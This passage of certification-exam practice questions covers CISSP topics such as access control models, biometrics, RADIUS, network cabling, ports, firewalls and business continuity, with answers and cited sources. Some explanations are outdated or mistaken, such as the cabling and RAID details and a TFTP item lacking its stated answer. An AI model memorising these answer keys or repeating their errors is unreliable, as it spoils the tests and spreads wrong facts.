Very little trust can be associated with confidentiality and integrity of information on the memory cards.
The following answers are incorrect:
"Smart cards provide two-factor authentication whereas memory cards don't" is incorrect. This is not necessarily true. A memory card can be combined with a pin or password to offer two factors authentication where something you have and something you know are used for factors.
"Memory cards normally hold more memory than smart cards" is incorrect. While a memory card may or may not have more memory than a smart card, this is certainly not the best answer to the question.
"Only smart cards can be used for ATM cards" is incorrect. This depends on the decisions made by the particular institution and is not the best answer to the question.
Reference(s) used for this question:
Shon Harris, CISSP All In One, 6th edition , Access Control, Page 199 and also for people using the Kindle edition of the book you can look at Locations 4647-4650.
Schneiter, Andrew (2013-04-15). Official (ISC)2 Guide to the CISSP CBK, Third Edition : Access Control ((ISC)2 Press) (Kindle Locations 2124-2139). Auerbach Publications. Kindle Edition.
In addition to the accuracy of the biometric systems, there are other factors that must also be considered:
These factors include the enrollment time and the throughput rate, but not acceptability.
These factors do not include the enrollment time, the throughput rate, and acceptability.
These factors include the enrollment time, the throughput rate, and acceptability.
These factors include the enrollment time, but not the throughput rate, neither the acceptability.
In addition to the accuracy of the biometric systems, there are other factors that must also be considered.
These factors include the enrollment time, the throughput rate, and acceptability.
Enrollment time is the time it takes to initially "register" with a system by providing samples of the biometric characteristic to be evaluated. An acceptable enrollment time is around two minutes.
For example, in fingerprint systems, the actual fingerprint is stored and requires approximately 250kb per finger for a high quality image. This level of information is required for one-to-many searches in forensics applications on very large databases.
In finger-scan technology, a full fingerprint is not stored-the features extracted from this fingerprint are stored using a small template that requires approximately 500 to 1000 bytes of storage. The original fingerprint cannot be reconstructed from this template.
Updates of the enrollment information may be required because some biometric characteristics, such as voice and signature, may change with time.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 37 & 38.
Which of the following statements pertaining to RADIUS is incorrect:
A RADIUS server can act as a proxy server, forwarding client requests to other authentication domains.
Most of RADIUS clients have a capability to query secondary RADIUS servers for redundancy.
Most RADIUS servers have built-in database connectivity for billing and reporting purposes.
Most RADIUS servers can work with DIAMETER servers.
This is the correct answer because it is FALSE.
Diameter is an AAA protocol, AAA stands for authentication, authorization and accounting protocol for computer networks, and it is a successor to RADIUS.
The name is a pun on the RADIUS protocol, which is the predecessor (a diameter is twice the radius).
The main differences are as follows:
Reliable transport protocols (TCP or SCTP, not UDP)
The IETF is in the process of standardizing TCP Transport for RADIUS
Network or transport layer security (IPsec or TLS)
The IETF is in the process of standardizing Transport Layer Security for RADIUS
Transition support for RADIUS, although Diameter is not fully compatible with RADIUS
Larger address space for attribute-value pairs (AVPs) and identifiers (32 bits instead of 8 bits)
Client–server protocol, with exception of supporting some server-initiated messages as well
Both stateful and stateless models can be used
Dynamic discovery of peers (using DNS SRV and NAPTR)
Capability negotiation
Supports application layer acknowledgements, defines failover methods and state machines (RFC 3539)
Error notification
Better roaming support
More easily extended; new commands and attributes can be defined
Aligned on 32-bit boundaries
Basic support for user-sessions and accounting
A Diameter Application is not a software application, but a protocol based on the Diameter base protocol (defined in RFC 3588). Each application is defined by an application identifier and can add new command codes and/or new mandatory AVPs. Adding a new optional AVP does not require a new application.
Examples of Diameter applications:
Diameter Mobile IPv4 Application (MobileIP, RFC 4004)
Diameter Network Access Server Application (NASREQ, RFC 4005)
Diameter Extensible Authentication Protocol (EAP) Application (RFC 4072)
Diameter Credit-Control Application (DCCA, RFC 4006)
Diameter Session Initiation Protocol Application (RFC 4740)
Various applications in the 3GPP IP Multimedia Subsystem
All of the other choices presented are true. So Diameter is backwork compatible with Radius (to some extent) but the opposite is false.
Reference(s) used for this question:
TIPTON, Harold F. & KRAUSE, MICKI, Information Security Management Handbook, 4th Edition, Volume 2, 2001, CRC Press, NY, Page 38.
and
https://secure.wikimedia.org/wikipedia/en/wiki/Diameter_%28protocol%29
What does the simple security (ss) property mean in the Bell-LaPadula model?
No read up
No write down
No read down
No write up
The ss (simple security) property of the Bell-LaPadula access control model states that reading of information by a subject at a lower sensitivity level from an object at a higher sensitivity level is not permitted (no read up).
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 5: Security Architectures and Models (page 202).
What is a common problem when using vibration detection devices for perimeter control?
They are vulnerable to non-adversarial disturbances.
They can be defeated by electronic means.
Signal amplitude is affected by weather conditions.
They must be buried below the frost line.
Vibration sensors are similar and are also implemented to detect forced entry. Financial institutions may choose to implement these types of sensors on exterior walls, where bank robbers may attempt to drive a vehicle through. They are also commonly used around the ceiling and flooring of vaults to detect someone trying to make an unauthorized bank withdrawal.
Such sensors are proned to false positive. If there is a large truck with heavy equipment driving by it may trigger the sensor. The same with a storm with thunder and lighting, it may trigger the alarm even thou there are no adversarial threat or disturbance.
The following are incorrect answers:
All of the other choices are incorrect.
Reference used for this question:
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (pp. 495-496). McGraw-Hill . Kindle Edition.
In regards to information classification what is the main responsibility of information (data) owner?
determining the data sensitivity or classification level
running regular data backups
audit the data users
periodically check the validity and accuracy of the data
Making the determination to decide what level of classification the information requires is the main responsibility of the data owner.
The data owner within classification is a person from Management who has been entrusted with a data set that belong to the company. It could be for example the Chief Financial Officer (CFO) who has been entrusted with all financial date or it could be the Human Resource Director who has been entrusted with all Human Resource data. The information owner will decide what classification will be applied to the data based on Confidentiality, Integrity, Availability, Criticality, and Sensitivity of the data.
The Custodian is the technical person who will implement the proper classification on objects in accordance with the Data Owner. The custodian DOES NOT decide what classification to apply, it is the Data Owner who will dictate to the Custodian what is the classification to apply.
NOTE:
The term Data Owner is also used within Discretionary Access Control (DAC). Within DAC it means the person who has created an object. For example, if I create a file on my system then I am the owner of the file and I can decide who else could get access to the file. It is left to my discretion. Within DAC access is granted based solely on the Identity of the subject, this is why sometimes DAC is referred to as Identity Based Access Control.
The other choices were not the best answer
Running regular backups is the responsibility of custodian.
Audit the data users is the responsibility of the auditors
Periodically check the validity and accuracy of the data is not one of the data owner responsibility
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Page 14, Chapter 1: Security Management Practices.
In non-discretionary access control using Role Based Access Control (RBAC), a central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on:
The societies role in the organization
The individual's role in the organization
The group-dynamics as they relate to the individual's role in the organization
The group-dynamics as they relate to the master-slave role in the organization
In Non-Discretionary Access Control, when Role Based Access Control is being used, a central authority determines what subjects can have access to certain objects based on the organizational security policy. The access controls may be based on the individual's role in the organization.
Reference(S) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 33.
What is the PRIMARY use of a password?
Allow access to files.
Identify the user.
Authenticate the user.
Segregate various user's accesses.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is true of network security?
A firewall is a not a necessity in today's connected world.
A firewall is a necessity in today's connected world.
A whitewall is a necessity in today's connected world.
A black firewall is a necessity in today's connected world.
Commercial firewalls are a dime-a-dozen in todays world. Black firewall and whitewall are just distracters.
Asynchronous Communication transfers data by sending:
bits of data sequentially
bits of data sequentially in irregular timing patterns
bits of data in sync with a heartbeat or clock
bits of data simultaneously
Asynchronous Communication transfers data by sending bits of data in irregular timing patterns.
In asynchronous transmission each character is transmitted separately, that is one character at a time. The character is preceded by a start bit, which tells the receiving end where the character coding begins, and is followed by a stop bit, which tells the receiver where the character coding ends. There will be intervals of ideal time on the channel shown as gaps. Thus there can be gaps between two adjacent characters in the asynchronous communication scheme. In this scheme, the bits within the character frame (including start, parity and stop bits) are sent at the baud rate.
The START BIT and STOP BIT including gaps allow the receiving and sending computers to synchronise the data transmission. Asynchronous communication is used when slow speed peripherals communicate with the computer. The main disadvantage of asynchronous communication is slow speed transmission. Asynchronous communication however, does not require the complex and costly hardware equipments as is required for synchronous transmission.
Asynchronous communication is transmission of data without the use of an external clock signal. Any timing required to recover data from the communication symbols is encoded within the symbols. The most significant aspect of asynchronous communications is variable bit rate, or that the transmitter and receiver clock generators do not have to be exactly synchronized.
The asynchronous communication technique is a physical layer transmission technique which is most widely used for personal computers providing connectivity to printers, modems, fax machines, etc.
An asynchronous link communicates data as a series of characters of fixed size and format. Each character is preceded by a start bit and followed by 1-2 stop bits.
Parity is often added to provide some limited protection against errors occurring on the link.
The use of independent transmit and receive clocks constrains transmission to relatively short characters (<8 bits) and moderate data rates (< 64 kbps, but typically lower).
The asynchronous transmitter delimits each character by a start sequence and a stop sequence. The start bit (0), data (usually 8 bits plus parity) and stop bit(s) (1) are transmitted using a shift register clocked at the nominal data rate.
When asynchronous transmission is used to support packet data links (e.g. IP), then special characters have to be used ("framing") to indicate the start and end of each frame transmitted.
One character (none as an escape character) is reserved to mark any occurrence of the special characters within the frame. In this way the receiver is able to identify which characters are part of the frame and which are part of the "framing".
Packet communication over asynchronous links is used by some users to get access to a network using a modem.
Most Wide Area Networks use synchronous links and a more sophisticated link protocol
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 100.
and
http://en.wikipedia.org/wiki/Asynchronous_communication
and
http://www.erg.abdn.ac.uk/users/gorry/course/phy-pages/async.html
and
http://www.ligaturesoft.com/data_communications/async-data-transmission.html
What is a limitation of TCP Wrappers?
It cannot control access to running UDP services.
It stops packets before they reach the application layer, thus confusing some proxy servers.
The hosts. access control system requires a complicated directory tree.
They are too expensive.
TCP Wrappers can control when a UDP server starts but has little control afterwards because UDP packets can be sent randomly.
The following answers are incorrect:
It stops packets before they reach the application layer, thus confusing some proxy servers. Is incorrect because the TCP Wrapper acts as an ACL restricting packets so would not confuse a proxy server because the packets would not arrive and would not be a limitation.
The hosts. access control system requires a complicated directory tree. Is incorrect because a simple directory tree is involved.
They are too expensive. Is incorrect because TCP Wrapper is considered open source with a BSD licensing scheme.
Which of the following was developed as a simple mechanism for allowing simple network terminals to load their operating system from a server over the LAN?
DHCP
BootP
DNS
ARP
BootP was developed as a simple mechanism for allowing simple network terminals to load their operating system from a server over the LAN. Over time, it has expanded to allow centralized configuration of many aspects of a host's identity and behavior on the network. Note that DHCP, more complex, has replaced BootP over time.
Source: STREBE, Matthew and PERKINS, Charles, Firewalls 24seven, Sybex 2000, Chapter 4: Sockets and Services from a Security Viewpoint.
Which of the following category of UTP cables is specified to be able to handle gigabit Ethernet (1 Gbps) according to the EIA/TIA-568-B standards?
Category 5e UTP
Category 2 UTP
Category 3 UTP
Category 1e UTP
Categories 1 through 6 are based on the EIA/TIA-568-B standards.
On the newer wiring for LANs is CAT5e, an improved version of CAT5 which used to be outside of the standard, for more information on twisted pair, please see: twisted pair.
Category Cable Type Mhz Usage Speed
=============================================
CAT1 UTP Analog voice, Plain Old Telephone System (POTS)
CAT2 UTP 4 Mbps on Token Ring, also used on Arcnet networks
CAT3 UTP, ScTP, STP 16 MHz 10 Mbps
CAT4 UTP, ScTP, STP 20 MHz 16 Mbps on Token Ring Networks
CAT5 UTP, ScTP, STP 100 MHz 100 Mbps on ethernet, 155 Mbps on ATM
CAT5e UTP, ScTP, STP 100 MHz 1 Gbps (out of standard version, improved version of CAT5)
CAT6 UTP, ScTP, STP 250 MHz 10 Gbps
CAT7 ScTP, STP 600 M 100 Gbps
Category 6 has a minumum of 250 MHz of bandwidth. Allowing 10/100/1000 use with up to 100 meter cable length, along with 10GbE over shorter distances.
Category 6a or Augmented Category 6 has a minimum of 500 MHz of bandwidth. It is the newest standard and allows up to 10GbE with a length up to 100m.
Category 7 is a future cabling standard that should allow for up to 100GbE over 100 meters of cable. Expected availability is in 2013. It has not been approved as a cable standard, and anyone now selling you Cat. 7 cable is fooling you.
REFERENCES:
http://donutey.com/ethernet.php
http://en.wikipedia.org/wiki/TIA/EIA-568-B
http://en.wikipedia.org/wiki/Category_1_cable
Which of the following is immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length?
Fiber Optic cable
Coaxial cable
Twisted Pair cable
Axial cable
Fiber Optic cable is immune to the effects of electromagnetic interference (EMI) and therefore has a much longer effective usable length (up to two kilometers in some cases).
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 72.
The standard server port number for HTTP is which of the following?
81
80
8080
8180
HTTP is Port 80.
Why are coaxial cables called "coaxial"?
it includes two physical channels that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis.
it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis
it includes two physical channels that carries the signal surrounded (after a layer of insulation) by another two concentric physical channels, both running along the same axis.
it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running perpendicular and along the different axis
Coaxial cable is called "coaxial" because it includes one physical channel that carries the signal surrounded (after a layer of insulation) by another concentric physical channel, both running along the same axis.
The outer channel serves as a ground. Many of these cables or pairs of coaxial tubes can be placed in a single outer sheathing and, with repeaters, can carry information for a great distance.
Source: STEINER, Kurt, Telecommunications and Network Security, Version 1, May 2002, CISSP Open Study Group (Domain Leader: skottikus), Page 14.
Which of the following is an IP address that is private (i.e. reserved for internal networks, and not a valid address to use on the Internet)?
10.0.42.5
11.0.42.5
12.0.42.5
13.0.42.5
This is a valid Class A reserved address. For Class A, the reserved addresses are 10.0.0.0 - 10.255.255.255.
The following answers are incorrect:
11.0.42.5 Is incorrect because it is not a Class A reserved address.
12.0.42.5 Is incorrect because it is not a Class A reserved address.
13.0.42.5 Is incorrect because it is not a Class A reserved address.
The private IP address ranges are defined within RFC 1918:
RFC 1918 private ip address range
References:
3Com http://www.3com.com/other/pdfs/infra/corpinfo/en_US/501302.pdf
AIOv3 Telecommunications and Networking Security (page 438)
Frame relay uses a public switched network to provide:
Local Area Network (LAN) connectivity.
Metropolitan Area Network (MAN) connectivity.
Wide Area Network (WAN) connectivity.
World Area Network (WAN) connectivity.
Frame relay uses a public switched network to provide Wide Area Network (WAN) connectivity.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 73.
Which of the following protocols suite does the Internet use?
IP/UDP/TCP
IP/UDP/ICMP/TCP
TCP/IP
IMAP/SMTP/POP3
Transmission Control Protocol/Internet Protocol (TCP/IP) is the common name for the suite of protocols that was developed by the Department of Defense (DoD) in the 1970's to support the construction of the internet. The Internet is based on TCP/IP.
The Internet protocol suite is the networking model and a set of communications protocols used for the Internet and similar networks. It is commonly known as TCP/IP, because its most important protocols, the Transmission Control Protocol (TCP) and the Internet Protocol (IP), were the first networking protocols defined in this standard. It is occasionally known as the DoD model, because the development of the networking model was funded by DARPA, an agency of the United States Department of Defense.
TCP/IP provides end-to-end connectivity specifying how data should be formatted, addressed, transmitted, routed and received at the destination. This functionality has been organized into four abstraction layers within the DoD Model which are used to sort all related protocols according to the scope of networking involved.
From lowest to highest, the layers are:
The link layer, containing communication technologies for a single network segment (link),
The internet layer, connecting independent networks, thus establishing internetworking,
The transport layer handling process-to-process communication,
The application layer, which interfaces to the user and provides support services.
The TCP/IP model and related protocols are maintained by the Internet Engineering Task Force (IETF).
The following answers are incorrect:
IP/UDP/TCP. This is incorrect, all three are popular protocol and they are not considered a suite of protocols.
IP/UDP/ICMP/TCP. This is incorrect, all 4 are some of the MOST commonly used protocol but they are not called a suite of protocol.
IMAP/SMTP/POP3 . This is incorrect because they are all email protocol and consist of only a few of the protocol that would be included in the TCP/IP suite of protocol.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 5267-5268). Auerbach Publications. Kindle Edition.
http://en.wikipedia.org/wiki/Internet_protocol_suite
Domain Name Service is a distributed database system that is used to map:
Domain Name to IP addresses.
MAC addresses to domain names.
MAC Address to IP addresses.
IP addresses to MAC Addresses.
The Domain Name Service is a distributed database system that is used to map domain names to IP addresses and IP addresses to domain names.
The Domain Name System is maintained by a distributed database system, which uses the client-server model. The nodes of this database are the name servers. Each domain has at least one authoritative DNS server that publishes information about that domain and the name servers of any domains subordinate to it. The top of the hierarchy is served by the root nameservers, the servers to query when looking up (resolving) a TLD.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 100.
and
https://en.wikipedia.org/wiki/Domain_Name_System
Which of the following media is MOST resistant to tapping?
microwave.
twisted pair.
coaxial cable.
fiber optic.
Fiber Optic is the most resistant to tapping because Fiber Optic uses a light to transmit the signal. While there are some technologies that will allow to monitor the line passively, it is very difficult to tap into without detection sot this technology would be the MOST resistent to tapping.
The following answers are in correct:
microwave. Is incorrect because microwave transmissions can be intercepted if in the path of the broadcast without detection.
twisted pair. Is incorrect because it is easy to tap into a twisted pair line.
coaxial cable. Is incorrect because it is easy to tap into a coaxial cable line.
Which of the following is a method of multiplexing data where a communication channel is divided into an arbitrary number of variable bit-rate digital channels or data streams. This method allocates bandwidth dynamically to physical channels having information to transmit?
Time-division multiplexing
Asynchronous time-division multiplexing
Statistical multiplexing
Frequency division multiplexing
Statistical multiplexing is a type of communication link sharing, very similar to dynamic bandwidth allocation (DBA). In statistical multiplexing, a communication channel is divided into an arbitrary number of variable bit-rate digital channels or data streams. The link sharing is adapted to the instantaneous traffic demands of the data streams that are transferred over each channel. This is an alternative to creating a fixed sharing of a link, such as in general time division multiplexing (TDM) and frequency division multiplexing (FDM). When performed correctly, statistical multiplexing can provide a link utilization improvement, called the statistical multiplexing gain.
Generally, the methods for multiplexing data include the following :
Time-division multiplexing (TDM): information from each data channel is allocated bandwidth based on pre-assigned time slots, regardless of whether there is data to transmit. Time-division multiplexing is used primarily for digital signals, but may be applied in analog multiplexing in which two or more signals or bit streams are transferred appearing simultaneously as sub-channels in one communication channel, but are physically taking turns on the channel. The time domain is divided into several recurrent time slots of fixed length, one for each sub-channel. A sample byte or data block of sub-channel 1 is transmitted during time slot 1, sub-channel 2 during time slot 2, etc. One TDM frame consists of one time slot per sub-channel plus a synchronization channel and sometimes error correction channel before the synchronization. After the last sub-channel, error correction, and synchronization, the cycle starts all over again with a new frame, starting with the second sample, byte or data block from sub-channel 1, etc.
Asynchronous time-division multiplexing (ATDM): information from data channels is allocated bandwidth as needed, via dynamically assigned time slots. ATM provides functionality that is similar to both circuit switching and packet switching networks: ATM uses asynchronous time-division multiplexing, and encodes data into small, fixed-sized packets (ISO-OSI frames) called cells. This differs from approaches such as the Internet Protocol or Ethernet that use variable sized packets and frames. ATM uses a connection-oriented model in which a virtual circuit must be established between two endpoints before the actual data exchange begins. These virtual circuits may be “permanent”, i.e. dedicated connections that are usually preconfigured by the service provider, or “switched”, i.e. set up on a per-call basis using signalling and disconnected when the call is terminated.
Frequency division multiplexing (FDM): information from each data channel is allocated bandwidth based on the signal frequency of the traffic. In telecommunications, frequency-division multiplexing (FDM) is a technique by which the total bandwidth available in a communication medium is divided into a series of non-overlapping frequency sub-bands, each of which is used to carry a separate signal. This allows a single transmission medium such as the radio spectrum, a cable or optical fiber to be shared by many signals.
Reference used for this question:
http://en.wikipedia.org/wiki/Statistical_multiplexing
and
http://en.wikipedia.org/wiki/Frequency_division_multiplexing
and
Information Systems Audit and Control Association, Certified Information Systems Auditor 2002 review manual, Chapter 3: Technical Infrastructure and Operational Practices (page 114).
If any server in the cluster crashes, processing continues transparently, however, the cluster suffers some performance degradation. This implementation is sometimes called a:
server farm
client farm
cluster farm
host farm
If any server in the cluster crashes, processing continues transparently, however, the cluster suffers some performance degradation. This implementation is sometimes called a "server farm."
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 67.
Each data packet is assigned the IP address of the sender and the IP address of the:
recipient.
host.
node.
network.
Each data packet is assigned the IP address of the sender and the IP address of the recipient. The term network refers to the part of the IP address that identifies each network. The terms host and node refer to the parts of the IP address that identify a specific machine on a network.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 87.
Why does fiber optic communication technology have significant security advantage over other transmission technology?
Higher data rates can be transmitted.
Interception of data traffic is more difficult.
Traffic analysis is prevented by multiplexing.
Single and double-bit errors are correctable.
It would be correct to select the first answer if the world "security" was not in the question.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following are REGISTERED PORTS as defined by IANA ?
Ports 128 to 255
Ports 1024 to 49151
Ports 1025 to 65535
Ports 1024 to 32767
Ports 1024 to 49151 has been defined as REGISTERED PORTS by IANA.
A registered port is a network port (a sub-address defined within the Internet Protocol, in the range 1–65535) assigned by the Internet Assigned Numbers Authority (IANA) (or by Internet Corporation for Assigned Names and Numbers (ICANN) before March 21, 2001) for use with a certain protocol or application.
Ports with numbers lower than those of the registered ports are called well known ports; ports with numbers greater than those of the registered ports are called dynamic and/or private ports.
Ports 0-1023 - well known ports
Ports 1024-49151 - Registered port: vendors use for applications
Ports >49151 - dynamic / private ports
The other answers are not correct
Reference(s) used for this question:
http://en.wikipedia.org/wiki/Registered_port
A group of independent servers, which are managed as a single system, that provides higher availability, easier manageability, and greater scalability is:
server cluster
client cluster
guest cluster
host cluster
A server cluster is a group of independent servers, which are managed as a single system, that provides higher availability, easier manageability, and greater scalability.
Source: KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 67.
How many layers are defined within the US Department of Defense (DoD) TCP/IP Model?
7
5
4
3
The TCP/IP protocol model is similar to the OSI model but it defines only four layers:
Application
Host-to-host
Internet
Network access
Reference(s) used for this question:
http://www.novell.com/documentation/nw65/ntwk_ipv4_nw/data/hozdx4oj.html
and
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 3: Telecommunications and Network Security (page 84).
also see:
http://en.wikipedia.org/wiki/Internet_Protocol_Suite#Layer_names_and_number_of_layers_in_the_literature
A variation of the application layer firewall is called a:
Current Level Firewall.
Cache Level Firewall.
Session Level Firewall.
Circuit Level Firewall.
Terminology can be confusing between the different souces as both CBK and AIO3 call an application layer firewall a proxy and proxy servers are generally classified as either circuit-level proxies or application level proxies.
The distinction is that a circuit level proxy creates a conduit through which a trusted host can communicate with an untrusted one and doesn't really look at the application contents of the packet (as an application level proxy does). SOCKS is one of the better known circuit-level proxies.
Firewalls
Packet Filtering Firewall - First Generation
n Screening Router
n Operates at Network and Transport level
n Examines Source and Destination IP Address
n Can deny based on ACLs
n Can specify Port
Application Level Firewall - Second Generation
n Proxy Server
n Copies each packet from one network to the other
n Masks the origin of the data
n Operates at layer 7 (Application Layer)
n Reduces Network performance since it has do analyze each packet and decide what to do with it.
n Also Called Application Layer Gateway
Stateful Inspection Firewalls – Third Generation
n Packets Analyzed at all OSI layers
n Queued at the network level
n Faster than Application level Gateway
Dynamic Packet Filtering Firewalls – Fourth Generation
n Allows modification of security rules
n Mostly used for UDP
n Remembers all of the UDP packets that have crossed the network’s perimeter, and it decides whether to enable packets to pass through the firewall.
Kernel Proxy – Fifth Generation
n Runs in NT Kernel
n Uses dynamic and custom TCP/IP-based stacks to inspect the network packets and to enforce security policies.
"Current level firewall" is incorrect. This is an amost-right-sounding distractor to confuse the unwary.
"Cache level firewall" is incorrect. This too is a distractor.
"Session level firewall" is incorrect. This too is a distractor.
References
CBK, p. 466 - 467
AIO3, pp. 486 - 490
CISSP Study Notes from Exam Prep Guide
What is the primary difference between FTP and TFTP?
Speed of negotiation
Authentication
Ability to automate
TFTP is used to transfer configuration files to and from network equipment.
TFTP (Trivial File Transfer Protocol) is sometimes used to transfer configuration files from equipments such as routers but the primary difference between FTP and TFTP is that TFTP does not require authentication. Speed and ability to automate are not important.
Both of these protocols (FTP and TFTP) can be used for transferring files across the Internet. The differences between the two protocols are explained below:
FTP is a complete, session-oriented, general purpose file transfer protocol. TFTP is used as a bare-bones special purpose file transfer protocol.
FTP can be used interactively. TFTP allows only unidirectional transfer of files.
FTP depends on TCP, is connection oriented, and provides reliable control. TFTP depends on UDP, requires less overhead, and provides virtually no control.
FTP provides user authentication. TFTP does not.
FTP uses well-known TCP port numbers: 20 for data and 21 for connection dialog. TFTP uses UDP port number 69 for its file transfer activity.
The Windows NT FTP server service does not support TFTP because TFTP does not support authentication.
Windows 95 and TCP/IP-32 for Windows for Workgroups do not include a TFTP client program.
Ref: http://support.microsoft.com/kb/102737
Secure Sockets Layer (SSL) is very heavily used for protecting which of the following?
Web transactions.
EDI transactions.
Telnet transactions.
Electronic Payment transactions.
SSL was developed Netscape Communications Corporation to improve security and privacy of HTTP transactions.
SSL is one of the most common protocols used to protect Internet traffic.
It encrypts the messages using symmetric algorithms, such as IDEA, DES, 3DES, and Fortezza, and also calculates the MAC for the message using MD5 or SHA-1. The MAC is appended to the message and encrypted along with the message data.
The exchange of the symmetric keys is accomplished through various versions of Diffie–Hellmann or RSA. TLS is the Internet standard based on SSLv3. TLSv1 is backward compatible with SSLv3. It uses the same algorithms as SSLv3; however, it computes an HMAC instead of a MAC along with other enhancements to improve security.
The following are incorrect answers:
"EDI transactions" is incorrect. Electronic Data Interchange (EDI) is not the best answer to this question though SSL could play a part in some EDI transactions.
"Telnet transactions" is incorrect. Telnet is a character mode protocol and is more likely to be secured by Secure Telnet or replaced by the Secure Shell (SSH) protocols.
"Eletronic payment transactions" is incorrect. Electronic payment is not the best answer to this question though SSL could play a part in some electronic payment transactions.
Reference(s) used for this question:
Hernandez CISSP, Steven (2012-12-21). Official (ISC)2 Guide to the CISSP CBK, Third Edition ((ISC)2 Press) (Kindle Locations 16615-16619). Auerbach Publications. Kindle Edition.
and
http://en.wikipedia.org/wiki/Transport_Layer_Security
A business continuity plan is an example of which of the following?
Corrective control
Detective control
Preventive control
Compensating control
Business Continuity Plans are designed to minimize the damage done by the event, and facilitate rapid restoration of the organization to its full operational capacity. They are for use "after the fact", thus are examples of corrective controls.
Reference(s) used for this question:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, John Wiley & Sons, 2001, Chapter 8: Business Continuity Planning and Disaster Recovery Planning (page 273).
and
Conrad, Eric; Misenar, Seth; Feldman, Joshua (2012-09-01). CISSP Study Guide (Kindle Location 8069). Elsevier Science (reference). Kindle Edition.
and
What can be defined as the maximum acceptable length of time that elapses before the unavailability of the system severely affects the organization?
Recovery Point Objectives (RPO)
Recovery Time Objectives (RTO)
Recovery Time Period (RTP)
Critical Recovery Time (CRT)
One of the results of a Business Impact Analysis is a determination of each business function's Recovery Time Objectives (RTO). The RTO is the amount of time allowed for the recovery of a business function. If the RTO is exceeded, then severe damage to the organization would result.
The Recovery Point Objectives (RPO) is the point in time in which data must be restored in order to resume processing.
Reference(s) used for this question:
BARNES, James C. & ROTHSTEIN, Philip J., A Guide to Business Continuity Planning, John Wiley & Sons, 2001 (page 68).
and
And: SWANSON, Marianne, & al., National Institute of Standards and Technology (NIST), NIST Special Publication 800-34, Contingency Planning Guide for Information Technology Systems, December 2001 (page 47).
Which element must computer evidence have to be admissible in court?
It must be relevant.
It must be annotated.
It must be printed.
It must contain source code.
Source: TIPTON, Hal, (ISC)2, Introduction to the CISSP Exam presentation.
Which of the following is a large hardware/software backup system that uses the RAID technology?
Tape Array.
Scale Array.
Crimson Array
Table Array.
A Tape Array is a large hardware/software backup system based on the RAID technology.
There is a misconception that RAID can only be used with Disks.
All large storage vendor from HP, to EMC, to Compaq have Tape Array based on RAID technology they offer.
This is a VERY common type of storage at an affordable price as well.
So RAID is not exclusively for DISKS. Often time this is referred to as Tape Librairies or simply RAIT.
RAIT (redundant array of independent tapes) is similar to RAID, but uses tape drives instead of disk drives. Tape storage is the lowest-cost option for very large amounts of data, but is very slow compared to disk storage. As in RAID 1 striping, in RAIT, data are striped in parallel to multiple tape drives, with or without a redundant parity drive. This provides the high capacity at low cost typical of tape storage, with higher-than-usual tape data transfer rates and optional data integrity.
References:
KRUTZ, Ronald L. & VINES, Russel D., The CISSP Prep Guide: Mastering the Ten Domains of Computer Security, 2001, John Wiley & Sons, Page 70.
and
Harris, Shon (2012-10-18). CISSP All-in-One Exam Guide, 6th Edition (p. 1271). McGraw-Hill. Kindle Edition.
Which of the following assertions is NOT true about pattern matching and anomaly detection in intrusion detection?
Anomaly detection tends to produce more data
A pattern matching IDS can only identify known attacks
Stateful matching scans for attack signatures by analyzing individual packets instead of traffic streams
An anomaly-based engine develops baselines of normal traffic activity and throughput, and alerts on deviations from these baselines
This is wrong which makes this the correct choice. This statement is not true as stateful matching scans for attack signatures by analyzing traffic streams rather than individual packets. Stateful matching intrusion detection takes pattern matching to the next level.
As networks become faster there is an emerging need for security analysis techniques that can keep up with the increased network throughput. Existing network-based intrusion detection sensors can barely keep up with bandwidths of a few hundred Mbps. Analysis tools that can deal with higher throughput are unable to maintain state between different steps of an attack or they are limited to the analysis of packet headers.
The following answers are all incorrect:
Anomaly detection tends to produce more data is true as an anomaly-based IDS produces a lot of data as any activity outside of expected behavior is recorded.
A pattern matching IDS can only identify known attacks is true as a pattern matching IDS works by comparing traffic streams against signatures. These signatures are created for known attacks.
An anomaly-based engine develops baselines of normal traffic activity and throughput, and alerts on deviations from these baselines is true as the assertion is a characteristic of a statistical anomaly-based IDS.
